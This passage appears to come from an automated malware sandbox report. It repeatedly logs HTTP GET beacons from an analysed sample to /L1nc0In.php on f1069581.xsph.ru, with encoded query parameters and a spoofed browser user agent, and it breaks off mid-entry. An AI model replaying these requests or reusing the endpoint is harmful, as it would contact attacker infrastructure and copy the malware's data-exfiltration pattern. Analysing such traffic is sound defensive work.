/L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzl0UXl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJJnSzImW5EDZsVDMMhmTXFWeWdlYCpUaPlWVtJmdwhlW0x2Rkl2dpl0dBRUT3FERNl2bql0cGdEZ6lzRjl2dplkeWdEZoJ1MVdWUXpFMs1mYWJ0UMdWUXpFcadVYqZ1RjpnQDRmd1sWS2kUealXOtl0cJN0TyEERNVXU65Ed3lXT5VkeOVXQE5UavpWSqlzRil2dplEVWxWS2k0UllnUuJWM5ITWpdXaJJnSzImWClHZsVzaJZTSpJmdsJjWspkbJNXS5FWe5c1VnNGWa9kSp9UarhEZw5UbJNXST9ENFpGT6lEVNVXWE5UdnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJl3Y1lTbaNnRtlkNJNlW0ZUbUlnVyMmVKNETpFERNNTRE5EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIihzMzY2MwITY0kDZxczYmJzY1MTMkNGZ4UGMjZDMzMWN1UTMzgTZiJiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: f1069581.xsph.ru
            Source: global trafficHTTP traffic detected: GET 